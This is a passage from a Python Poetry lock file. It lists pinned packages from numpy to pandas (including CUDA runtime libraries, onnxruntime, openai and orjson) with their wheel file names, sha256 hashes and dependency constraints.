{file = "numpy-1.24.4-cp311-cp311-win32.whl", hash = "sha256:4979217d7de511a8d57f4b4b5b2b965f707768440c17cb70fbf254c4b225238d"},
{file = "numpy-1.24.4-cp311-cp311-win_amd64.whl", hash = "sha256:b7b1fc9864d7d39e28f41d089bfd6353cb5f27ecd9905348c24187a768c79694"},
{file = "numpy-1.24.4-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:1452241c290f3e2a312c137a9999cdbf63f78864d63c79039bda65ee86943f61"},
{file = "numpy-1.24.4-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:04640dab83f7c6c85abf9cd729c5b65f1ebd0ccf9de90b270cd61935eef0197f"},
{file = "numpy-1.24.4-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a5425b114831d1e77e4b5d812b69d11d962e104095a5b9c3b641a218abcc050e"},
{file = "numpy-1.24.4-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dd80e219fd4c71fc3699fc1dadac5dcf4fd882bfc6f7ec53d30fa197b8ee22dc"},
{file = "numpy-1.24.4-cp38-cp38-win32.whl", hash = "sha256:4602244f345453db537be5314d3983dbf5834a9701b7723ec28923e2889e0bb2"},
{file = "numpy-1.24.4-cp38-cp38-win_amd64.whl", hash = "sha256:692f2e0f55794943c5bfff12b3f56f99af76f902fc47487bdfe97856de51a706"},
{file = "numpy-1.24.4-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:2541312fbf09977f3b3ad449c4e5f4bb55d0dbf79226d7724211acc905049400"},
{file = "numpy-1.24.4-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:9667575fb6d13c95f1b36aca12c5ee3356bf001b714fc354eb5465ce1609e62f"},
{file = "numpy-1.24.4-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f3a86ed21e4f87050382c7bc96571755193c4c1392490744ac73d660e8f564a9"},
{file = "numpy-1.24.4-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d11efb4dbecbdf22508d55e48d9c8384db795e1b7b51ea735289ff96613ff74d"},
{file = "numpy-1.24.4-cp39-cp39-win32.whl", hash = "sha256:6620c0acd41dbcb368610bb2f4d83145674040025e5536954782467100aa8835"},
{file = "numpy-1.24.4-cp39-cp39-win_amd64.whl", hash = "sha256:befe2bf740fd8373cf56149a5c23a0f601e82869598d41f8e188a0e9869926f8"},
{file = "numpy-1.24.4-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:31f13e25b4e304632a4619d0e0777662c2ffea99fcae2029556b17d8ff958aef"},
{file = "numpy-1.24.4-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:95f7ac6540e95bc440ad77f56e520da5bf877f87dca58bd095288dce8940532a"},
{file = "numpy-1.24.4-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:e98f220aa76ca2a977fe435f5b04d7b3470c0a2e6312907b37ba6068f26787f2"},
{file = "numpy-1.24.4.tar.gz", hash = "sha256:80f5e3a4e498641401868df4208b74581206afbee7cf7b8329daae82676d9463"},
]
[[package]]
name = "nvidia-cublas-cu11"
version = "11.10.3.66"
description = "CUBLAS native runtime libraries"
optional = true
python-versions = ">=3"
files = [
{file = "nvidia_cublas_cu11-11.10.3.66-py3-none-manylinux1_x86_64.whl", hash = "sha256:d32e4d75f94ddfb93ea0a5dda08389bcc65d8916a25cb9f37ac89edaeed3bded"},
{file = "nvidia_cublas_cu11-11.10.3.66-py3-none-win_amd64.whl", hash = "sha256:8ac17ba6ade3ed56ab898a036f9ae0756f1e81052a317bf98f8c6d18dc3ae49e"},
]
[package.dependencies]
setuptools = "*"
wheel = "*"
[[package]]
name = "nvidia-cuda-nvrtc-cu11"
version = "11.7.99"
description = "NVRTC native runtime libraries"
optional = true
python-versions = ">=3"
files = [
{file = "nvidia_cuda_nvrtc_cu11-11.7.99-2-py3-none-manylinux1_x86_64.whl", hash = "sha256:9f1562822ea264b7e34ed5930567e89242d266448e936b85bc97a3370feabb03"},
{file = "nvidia_cuda_nvrtc_cu11-11.7.99-py3-none-manylinux1_x86_64.whl", hash = "sha256:f7d9610d9b7c331fa0da2d1b2858a4a8315e6d49765091d28711c8946e7425e7"},
{file = "nvidia_cuda_nvrtc_cu11-11.7.99-py3-none-win_amd64.whl", hash = "sha256:f2effeb1309bdd1b3854fc9b17eaf997808f8b25968ce0c7070945c4265d64a3"},
]
[package.dependencies]
setuptools = "*"
wheel = "*"
[[package]]
name = "nvidia-cuda-runtime-cu11"
version = "11.7.99"
description = "CUDA Runtime native Libraries"
optional = true
python-versions = ">=3"
files = [
{file = "nvidia_cuda_runtime_cu11-11.7.99-py3-none-manylinux1_x86_64.whl", hash = "sha256:cc768314ae58d2641f07eac350f40f99dcb35719c4faff4bc458a7cd2b119e31"},
{file = "nvidia_cuda_runtime_cu11-11.7.99-py3-none-win_amd64.whl", hash = "sha256:bc77fa59a7679310df9d5c70ab13c4e34c64ae2124dd1efd7e5474b71be125c7"},
]
[package.dependencies]
setuptools = "*"
wheel = "*"
[[package]]
name = "nvidia-cudnn-cu11"
version = "8.5.0.96"
description = "cuDNN runtime libraries"
optional = true
python-versions = ">=3"
files = [
{file = "nvidia_cudnn_cu11-8.5.0.96-2-py3-none-manylinux1_x86_64.whl", hash = "sha256:402f40adfc6f418f9dae9ab402e773cfed9beae52333f6d86ae3107a1b9527e7"},
{file = "nvidia_cudnn_cu11-8.5.0.96-py3-none-manylinux1_x86_64.whl", hash = "sha256:71f8111eb830879ff2836db3cccf03bbd735df9b0d17cd93761732ac50a8a108"},
]
[package.dependencies]
setuptools = "*"
wheel = "*"
[[package]]
name = "o365"
version = "2.0.28"
description = "Microsoft Graph and Office 365 API made easy"
optional = true
python-versions = ">=3.4"
files = [
{file = "O365-2.0.28-py3-none-any.whl", hash = "sha256:61127377a4f5ed55f447ad20fbd02d78f06b50696b12f3ad2c608bdf911eef7b"},
{file = "O365-2.0.28.tar.gz", hash = "sha256:f1ab2f8ecaa399da7202df554a0b55a70358bbaead82bb0fcd048e67aac822f3"},
]
[package.dependencies]
beautifulsoup4 = ">=4.0.0"
python-dateutil = ">=2.7"
pytz = ">=2018.5"
requests = ">=2.18.0"
requests-oauthlib = ">=1.2.0"
stringcase = ">=1.2.0"
tzlocal = ">=4.0,<5.0"
[[package]]
name = "oauthlib"
version = "3.2.2"
description = "A generic, spec-compliant, thorough implementation of the OAuth request-signing logic"
optional = true
python-versions = ">=3.6"
files = [
{file = "oauthlib-3.2.2-py3-none-any.whl", hash = "sha256:8139f29aac13e25d502680e9e19963e83f16838d48a0d71c287fe40e7067fbca"},
{file = "oauthlib-3.2.2.tar.gz", hash = "sha256:9859c40929662bec5d64f34d01c99e093149682a3f38915dc0655d5a633dd918"},
]
[package.extras]
rsa = ["cryptography (>=3.0.0)"]
signals = ["blinker (>=1.4.0)"]
signedtoken = ["cryptography (>=3.0.0)", "pyjwt (>=2.0.0,<3)"]
[[package]]
name = "onnxruntime"
version = "1.16.1"
description = "ONNX Runtime is a runtime accelerator for Machine Learning models"
optional = true
python-versions = "*"
files = [
{file = "onnxruntime-1.16.1-cp310-cp310-macosx_10_15_x86_64.whl", hash = "sha256:28b2c7f444b4119950b69370801cd66067f403d19cbaf2a444735d7c269cce4a"},
{file = "onnxruntime-1.16.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:c24e04f33e7899f6aebb03ed51e51d346c1f906b05c5569d58ac9a12d38a2f58"},
{file = "onnxruntime-1.16.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9fa93b166f2d97063dc9f33c5118c5729a4a5dd5617296b6dbef42f9047b3e81"},
{file = "onnxruntime-1.16.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:042dd9201b3016ee18f8f8bc4609baf11ff34ca1ff489c0a46bcd30919bf883d"},
{file = "onnxruntime-1.16.1-cp310-cp310-win32.whl", hash = "sha256:c20aa0591f305012f1b21aad607ed96917c86ae7aede4a4dd95824b3d124ceb7"},
{file = "onnxruntime-1.16.1-cp310-cp310-win_amd64.whl", hash = "sha256:5581873e578917bea76d6434ee7337e28195d03488dcf72d161d08e9398c6249"},
{file = "onnxruntime-1.16.1-cp311-cp311-macosx_10_15_x86_64.whl", hash = "sha256:ef8c0c8abf5f309aa1caf35941380839dc5f7a2fa53da533be4a3f254993f120"},
{file = "onnxruntime-1.16.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:e680380bea35a137cbc3efd67a17486e96972901192ad3026ee79c8d8fe264f7"},
{file = "onnxruntime-1.16.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5e62cc38ce1a669013d0a596d984762dc9c67c56f60ecfeee0d5ad36da5863f6"},
{file = "onnxruntime-1.16.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:025c7a4d57bd2e63b8a0f84ad3df53e419e3df1cc72d63184f2aae807b17c13c"},
{file = "onnxruntime-1.16.1-cp311-cp311-win32.whl", hash = "sha256:9ad074057fa8d028df248b5668514088cb0937b6ac5954073b7fb9b2891ffc8c"},
{file = "onnxruntime-1.16.1-cp311-cp311-win_amd64.whl", hash = "sha256:d5e43a3478bffc01f817ecf826de7b25a2ca1bca8547d70888594ab80a77ad24"},
{file = "onnxruntime-1.16.1-cp38-cp38-macosx_10_15_x86_64.whl", hash = "sha256:3aef4d70b0930e29a8943eab248cd1565664458d3a62b2276bd11181f28fd0a3"},
{file = "onnxruntime-1.16.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:55a7b843a57c8ca0c8ff169428137958146081d5d76f1a6dd444c4ffcd37c3c2"},
{file = "onnxruntime-1.16.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:62c631af1941bf3b5f7d063d24c04aacce8cff0794e157c497e315e89ac5ad7b"},
{file = "onnxruntime-1.16.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5671f296c3d5c233f601e97a10ab5a1dd8e65ba35c7b7b0c253332aba9dff330"},
{file = "onnxruntime-1.16.1-cp38-cp38-win32.whl", hash = "sha256:eb3802305023dd05e16848d4e22b41f8147247894309c0c27122aaa08793b3d2"},
{file = "onnxruntime-1.16.1-cp38-cp38-win_amd64.whl", hash = "sha256:fecfb07443d09d271b1487f401fbdf1ba0c829af6fd4fe8f6af25f71190e7eb9"},
{file = "onnxruntime-1.16.1-cp39-cp39-macosx_10_15_x86_64.whl", hash = "sha256:de3e12094234db6545c67adbf801874b4eb91e9f299bda34c62967ef0050960f"},
{file = "onnxruntime-1.16.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:ff723c2a5621b5e7103f3be84d5aae1e03a20621e72219dddceae81f65f240af"},
{file = "onnxruntime-1.16.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:14a7fb3073aaf6b462e3d7fb433320f7700558a8892e5021780522dc4574292a"},
{file = "onnxruntime-1.16.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:963159f1f699b0454cd72fcef3276c8a1aab9389a7b301bcd8e320fb9d9e8597"},
{file = "onnxruntime-1.16.1-cp39-cp39-win32.whl", hash = "sha256:85771adb75190db9364b25ddec353ebf07635b83eb94b64ed014f1f6d57a3857"},
{file = "onnxruntime-1.16.1-cp39-cp39-win_amd64.whl", hash = "sha256:d32d2b30799c1f950123c60ae8390818381fd5f88bdf3627eeca10071c155dc5"},
]
[package.dependencies]
coloredlogs = "*"
flatbuffers = "*"
numpy = ">=1.21.6"
packaging = "*"
protobuf = "*"
sympy = "*"
[[package]]
name = "openai"
version = "0.27.10"
description = "Python client library for the OpenAI API"
optional = false
python-versions = ">=3.7.1"
files = [
{file = "openai-0.27.10-py3-none-any.whl", hash = "sha256:beabd1757e3286fa166dde3b70ebb5ad8081af046876b47c14c41e203ed22a14"},
{file = "openai-0.27.10.tar.gz", hash = "sha256:60e09edf7100080283688748c6803b7b3b52d5a55d21890f3815292a0552d83b"},
]
[package.dependencies]
aiohttp = "*"
requests = ">=2.20"
tqdm = "*"
[package.extras]
datalib = ["numpy", "openpyxl (>=3.0.7)", "pandas (>=1.2.3)", "pandas-stubs (>=1.1.0.11)"]
dev = ["black (>=21.6b0,<22.0)", "pytest (==6.*)", "pytest-asyncio", "pytest-mock"]
embeddings = ["matplotlib", "numpy", "openpyxl (>=3.0.7)", "pandas (>=1.2.3)", "pandas-stubs (>=1.1.0.11)", "plotly", "scikit-learn (>=1.0.2)", "scipy", "tenacity (>=8.0.1)"]
wandb = ["numpy", "openpyxl (>=3.0.7)", "pandas (>=1.2.3)", "pandas-stubs (>=1.1.0.11)", "wandb"]
[[package]]
name = "openapi-pydantic"
version = "0.3.2"
description = "Pydantic OpenAPI schema implementation"
optional = true
python-versions = ">=3.8,<4.0"
files = [
{file = "openapi_pydantic-0.3.2-py3-none-any.whl", hash = "sha256:24488566a0a61bee3b55de6d3665329adaf2aadfe8f292ac0bddfe22155fadac"},
{file = "openapi_pydantic-0.3.2.tar.gz", hash = "sha256:685aa631395c469ecfd04f01a2ffedd541f94d372943868a501b412e9de6ba8b"},
]
[package.dependencies]
pydantic = ">=1.8"
[[package]]
name = "opencv-python"
version = "4.8.1.78"
description = "Wrapper package for OpenCV python bindings."
optional = true
python-versions = ">=3.6"
files = [
{file = "opencv-python-4.8.1.78.tar.gz", hash = "sha256:cc7adbbcd1112877a39274106cb2752e04984bc01a031162952e97450d6117f6"},
{file = "opencv_python-4.8.1.78-cp37-abi3-macosx_10_16_x86_64.whl", hash = "sha256:91d5f6f5209dc2635d496f6b8ca6573ecdad051a09e6b5de4c399b8e673c60da"},
{file = "opencv_python-4.8.1.78-cp37-abi3-macosx_11_0_arm64.whl", hash = "sha256:bc31f47e05447da8b3089faa0a07ffe80e114c91ce0b171e6424f9badbd1c5cd"},
{file = "opencv_python-4.8.1.78-cp37-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9814beca408d3a0eca1bae7e3e5be68b07c17ecceb392b94170881216e09b319"},
{file = "opencv_python-4.8.1.78-cp37-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c4c406bdb41eb21ea51b4e90dfbc989c002786c3f601c236a99c59a54670a394"},
{file = "opencv_python-4.8.1.78-cp37-abi3-win32.whl", hash = "sha256:a7aac3900fbacf55b551e7b53626c3dad4c71ce85643645c43e91fcb19045e47"},
{file = "opencv_python-4.8.1.78-cp37-abi3-win_amd64.whl", hash = "sha256:b983197f97cfa6fcb74e1da1802c7497a6f94ed561aba6980f1f33123f904956"},
]
[package.dependencies]
numpy = [
{version = ">=1.23.5", markers = "python_version >= \"3.11\""},
{version = ">=1.21.0", markers = "python_version <= \"3.9\" and platform_system == \"Darwin\" and platform_machine == \"arm64\" and python_version >= \"3.8\""},
{version = ">=1.19.3", markers = "platform_system == \"Linux\" and platform_machine == \"aarch64\" and python_version >= \"3.8\" and python_version < \"3.10\" or python_version > \"3.9\" and python_version < \"3.10\" or python_version >= \"3.9\" and platform_system != \"Darwin\" and python_version < \"3.10\" or python_version >= \"3.9\" and platform_machine != \"arm64\" and python_version < \"3.10\""},
{version = ">=1.17.3", markers = "(platform_system != \"Darwin\" and platform_system != \"Linux\") and python_version >= \"3.8\" and python_version < \"3.9\" or platform_system != \"Darwin\" and python_version >= \"3.8\" and python_version < \"3.9\" and platform_machine != \"aarch64\" or platform_machine != \"arm64\" and python_version >= \"3.8\" and python_version < \"3.9\" and platform_system != \"Linux\" or (platform_machine != \"arm64\" and platform_machine != \"aarch64\") and python_version >= \"3.8\" and python_version < \"3.9\""},
{version = ">=1.21.4", markers = "python_version >= \"3.10\" and platform_system == \"Darwin\" and python_version < \"3.11\""},
{version = ">=1.21.2", markers = "platform_system != \"Darwin\" and python_version >= \"3.10\" and python_version < \"3.11\""},
]
[[package]]
name = "openlm"
version = "0.0.5"
description = "Drop-in OpenAI-compatible that can call LLMs from other providers"
optional = true
python-versions = ">=3.8.1,<4.0"
files = [
{file = "openlm-0.0.5-py3-none-any.whl", hash = "sha256:9fcbbc575d2869e2a6c0b00827f9be2189c067c2de4bf03ef3cbdf488367ae93"},
{file = "openlm-0.0.5.tar.gz", hash = "sha256:0eb3fd7a9e4f7b4248931ff2f0dc91c525d990b99956886861a1b3f9868bc451"},
]
[package.dependencies]
requests = ">=2,<3"
[[package]]
name = "opensearch-py"
version = "2.3.2"
description = "Python client for OpenSearch"
optional = true
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, <4"
files = [
{file = "opensearch-py-2.3.2.tar.gz", hash = "sha256:96e470b55107fd5bfd873722dc9808c333360eacfa174341f5cc2d021aa30448"},
{file = "opensearch_py-2.3.2-py2.py3-none-any.whl", hash = "sha256:b1d6607380c8f19d90c142470939d051f0bac96069ce0ac25970b3c39c431f8b"},
]
[package.dependencies]
certifi = ">=2022.12.07"
python-dateutil = "*"
requests = ">=2.4.0,<3.0.0"
six = "*"
urllib3 = ">=1.26.9"
[package.extras]
async = ["aiohttp (>=3,<4)"]
develop = ["black", "botocore", "coverage (<7.0.0)", "jinja2", "mock", "myst-parser", "pytest (>=3.0.0)", "pytest-cov", "pytest-mock (<4.0.0)", "pytz", "pyyaml", "requests (>=2.0.0,<3.0.0)", "sphinx", "sphinx-copybutton", "sphinx-rtd-theme"]
docs = ["myst-parser", "sphinx", "sphinx-copybutton", "sphinx-rtd-theme"]
kerberos = ["requests-kerberos"]
[[package]]
name = "opt-einsum"
version = "3.3.0"
description = "Optimizing numpys einsum function"
optional = true
python-versions = ">=3.5"
files = [
{file = "opt_einsum-3.3.0-py3-none-any.whl", hash = "sha256:2455e59e3947d3c275477df7f5205b30635e266fe6dc300e3d9f9646bfcea147"},
{file = "opt_einsum-3.3.0.tar.gz", hash = "sha256:59f6475f77bbc37dcf7cd748519c0ec60722e91e63ca114e68821c0c54a46549"},
]
[package.dependencies]
numpy = ">=1.7"
[package.extras]
docs = ["numpydoc", "sphinx (==1.2.3)", "sphinx-rtd-theme", "sphinxcontrib-napoleon"]
tests = ["pytest", "pytest-cov", "pytest-pep8"]
[[package]]
name = "orjson"
version = "3.9.10"
description = "Fast, correct Python JSON library supporting dataclasses, datetimes, and numpy"
optional = true
python-versions = ">=3.8"
files = [
{file = "orjson-3.9.10-cp310-cp310-macosx_10_15_x86_64.macosx_11_0_arm64.macosx_10_15_universal2.whl", hash = "sha256:c18a4da2f50050a03d1da5317388ef84a16013302a5281d6f64e4a3f406aabc4"},
{file = "orjson-3.9.10-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5148bab4d71f58948c7c39d12b14a9005b6ab35a0bdf317a8ade9a9e4d9d0bd5"},
{file = "orjson-3.9.10-cp310-cp310-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:4cf7837c3b11a2dfb589f8530b3cff2bd0307ace4c301e8997e95c7468c1378e"},
{file = "orjson-3.9.10-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:c62b6fa2961a1dcc51ebe88771be5319a93fd89bd247c9ddf732bc250507bc2b"},
{file = "orjson-3.9.10-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:deeb3922a7a804755bbe6b5be9b312e746137a03600f488290318936c1a2d4dc"},
{file = "orjson-3.9.10-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1234dc92d011d3554d929b6cf058ac4a24d188d97be5e04355f1b9223e98bbe9"},
{file = "orjson-3.9.10-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:06ad5543217e0e46fd7ab7ea45d506c76f878b87b1b4e369006bdb01acc05a83"},
{file = "orjson-3.9.10-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:4fd72fab7bddce46c6826994ce1e7de145ae1e9e106ebb8eb9ce1393ca01444d"},
{file = "orjson-3.9.10-cp310-none-win32.whl", hash = "sha256:b5b7d4a44cc0e6ff98da5d56cde794385bdd212a86563ac321ca64d7f80c80d1"},
{file = "orjson-3.9.10-cp310-none-win_amd64.whl", hash = "sha256:61804231099214e2f84998316f3238c4c2c4aaec302df12b21a64d72e2a135c7"},
{file = "orjson-3.9.10-cp311-cp311-macosx_10_15_x86_64.macosx_11_0_arm64.macosx_10_15_universal2.whl", hash = "sha256:cff7570d492bcf4b64cc862a6e2fb77edd5e5748ad715f487628f102815165e9"},
{file = "orjson-3.9.10-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ed8bc367f725dfc5cabeed1ae079d00369900231fbb5a5280cf0736c30e2adf7"},
{file = "orjson-3.9.10-cp311-cp311-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:c812312847867b6335cfb264772f2a7e85b3b502d3a6b0586aa35e1858528ab1"},
{file = "orjson-3.9.10-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:9edd2856611e5050004f4722922b7b1cd6268da34102667bd49d2a2b18bafb81"},
{file = "orjson-3.9.10-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:674eb520f02422546c40401f4efaf8207b5e29e420c17051cddf6c02783ff5ca"},
{file = "orjson-3.9.10-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1d0dc4310da8b5f6415949bd5ef937e60aeb0eb6b16f95041b5e43e6200821fb"},
{file = "orjson-3.9.10-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:e99c625b8c95d7741fe057585176b1b8783d46ed4b8932cf98ee145c4facf499"},
{file = "orjson-3.9.10-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:ec6f18f96b47299c11203edfbdc34e1b69085070d9a3d1f302810cc23ad36bf3"},
{file = "orjson-3.9.10-cp311-none-win32.whl", hash = "sha256:ce0a29c28dfb8eccd0f16219360530bc3cfdf6bf70ca384dacd36e6c650ef8e8"},
{file = "orjson-3.9.10-cp311-none-win_amd64.whl", hash = "sha256:cf80b550092cc480a0cbd0750e8189247ff45457e5a023305f7ef1bcec811616"},
{file = "orjson-3.9.10-cp312-cp312-macosx_10_15_x86_64.macosx_11_0_arm64.macosx_10_15_universal2.whl", hash = "sha256:602a8001bdf60e1a7d544be29c82560a7b49319a0b31d62586548835bbe2c862"},
{file = "orjson-3.9.10-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f295efcd47b6124b01255d1491f9e46f17ef40d3d7eabf7364099e463fb45f0f"},
{file = "orjson-3.9.10-cp312-cp312-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:92af0d00091e744587221e79f68d617b432425a7e59328ca4c496f774a356071"},
{file = "orjson-3.9.10-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:c5a02360e73e7208a872bf65a7554c9f15df5fe063dc047f79738998b0506a14"},
{file = "orjson-3.9.10-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:858379cbb08d84fe7583231077d9a36a1a20eb72f8c9076a45df8b083724ad1d"},
{file = "orjson-3.9.10-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:666c6fdcaac1f13eb982b649e1c311c08d7097cbda24f32612dae43648d8db8d"},
{file = "orjson-3.9.10-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:3fb205ab52a2e30354640780ce4587157a9563a68c9beaf52153e1cea9aa0921"},
{file = "orjson-3.9.10-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:7ec960b1b942ee3c69323b8721df2a3ce28ff40e7ca47873ae35bfafeb4555ca"},
{file = "orjson-3.9.10-cp312-none-win_amd64.whl", hash = "sha256:3e892621434392199efb54e69edfff9f699f6cc36dd9553c5bf796058b14b20d"},
{file = "orjson-3.9.10-cp38-cp38-macosx_10_15_x86_64.macosx_11_0_arm64.macosx_10_15_universal2.whl", hash = "sha256:8b9ba0ccd5a7f4219e67fbbe25e6b4a46ceef783c42af7dbc1da548eb28b6531"},
{file = "orjson-3.9.10-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2e2ecd1d349e62e3960695214f40939bbfdcaeaaa62ccc638f8e651cf0970e5f"},
{file = "orjson-3.9.10-cp38-cp38-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:7f433be3b3f4c66016d5a20e5b4444ef833a1f802ced13a2d852c637f69729c1"},
{file = "orjson-3.9.10-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:4689270c35d4bb3102e103ac43c3f0b76b169760aff8bcf2d401a3e0e58cdb7f"},
{file = "orjson-3.9.10-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:4bd176f528a8151a6efc5359b853ba3cc0e82d4cd1fab9c1300c5d957dc8f48c"},
{file = "orjson-3.9.10-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3a2ce5ea4f71681623f04e2b7dadede3c7435dfb5e5e2d1d0ec25b35530e277b"},
{file = "orjson-3.9.10-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:49f8ad582da6e8d2cf663c4ba5bf9f83cc052570a3a767487fec6af839b0e777"},
{file = "orjson-3.9.10-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:2a11b4b1a8415f105d989876a19b173f6cdc89ca13855ccc67c18efbd7cbd1f8"},
{file = "orjson-3.9.10-cp38-none-win32.whl", hash = "sha256:a353bf1f565ed27ba71a419b2cd3db9d6151da426b61b289b6ba1422a702e643"},
{file = "orjson-3.9.10-cp38-none-win_amd64.whl", hash = "sha256:e28a50b5be854e18d54f75ef1bb13e1abf4bc650ab9d635e4258c58e71eb6ad5"},
{file = "orjson-3.9.10-cp39-cp39-macosx_10_15_x86_64.macosx_11_0_arm64.macosx_10_15_universal2.whl", hash = "sha256:ee5926746232f627a3be1cc175b2cfad24d0170d520361f4ce3fa2fd83f09e1d"},
{file = "orjson-3.9.10-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0a73160e823151f33cdc05fe2cea557c5ef12fdf276ce29bb4f1c571c8368a60"},
{file = "orjson-3.9.10-cp39-cp39-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:c338ed69ad0b8f8f8920c13f529889fe0771abbb46550013e3c3d01e5174deef"},
{file = "orjson-3.9.10-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:5869e8e130e99687d9e4be835116c4ebd83ca92e52e55810962446d841aba8de"},
{file = "orjson-3.9.10-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d2c1e559d96a7f94a4f581e2a32d6d610df5840881a8cba8f25e446f4d792df3"},
{file = "orjson-3.9.10-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:81a3a3a72c9811b56adf8bcc829b010163bb2fc308877e50e9910c9357e78521"},
{file = "orjson-3.9.10-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:7f8fb7f5ecf4f6355683ac6881fd64b5bb2b8a60e3ccde6ff799e48791d8f864"},
{file = "orjson-3.9.10-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:c943b35ecdf7123b2d81d225397efddf0bce2e81db2f3ae633ead38e85cd5ade"},
{file = "orjson-3.9.10-cp39-none-win32.whl", hash = "sha256:fb0b361d73f6b8eeceba47cd37070b5e6c9de5beaeaa63a1cb35c7e1a73ef088"},
{file = "orjson-3.9.10-cp39-none-win_amd64.whl", hash = "sha256:b90f340cb6397ec7a854157fac03f0c82b744abdd1c0941a024c3c29d1340aff"},
{file = "orjson-3.9.10.tar.gz", hash = "sha256:9ebbdbd6a046c304b1845e96fbcc5559cd296b4dfd3ad2509e33c4d9ce07d6a1"},
]
[[package]]
name = "overrides"
version = "7.4.0"
description = "A decorator to automatically detect mismatch when overriding a method."
optional = false
python-versions = ">=3.6"
files = [
{file = "overrides-7.4.0-py3-none-any.whl", hash = "sha256:3ad24583f86d6d7a49049695efe9933e67ba62f0c7625d53c59fa832ce4b8b7d"},
{file = "overrides-7.4.0.tar.gz", hash = "sha256:9502a3cca51f4fac40b5feca985b6703a5c1f6ad815588a7ca9e285b9dca6757"},
]
[[package]]
name = "packaging"
version = "23.2"
description = "Core utilities for Python packages"
optional = false
python-versions = ">=3.7"
files = [
{file = "packaging-23.2-py3-none-any.whl", hash = "sha256:8c491190033a9af7e1d931d0b5dacc2ef47509b34dd0de67ed209b5203fc88c7"},
{file = "packaging-23.2.tar.gz", hash = "sha256:048fb0e9405036518eaaf48a55953c750c11e1a1b68e0dd1a9d62ed0c092cfc5"},
]
[[package]]
name = "pandas"
version = "2.0.3"
description = "Powerful data structures for data analysis, time series, and statistics"
optional = false
python-versions = ">=3.8"
files = [
{file = "pandas-2.0.3-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:e4c7c9f27a4185304c7caf96dc7d91bc60bc162221152de697c98eb0b2648dd8"},
{file = "pandas-2.0.3-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:f167beed68918d62bffb6ec64f2e1d8a7d297a038f86d4aed056b9493fca407f"},
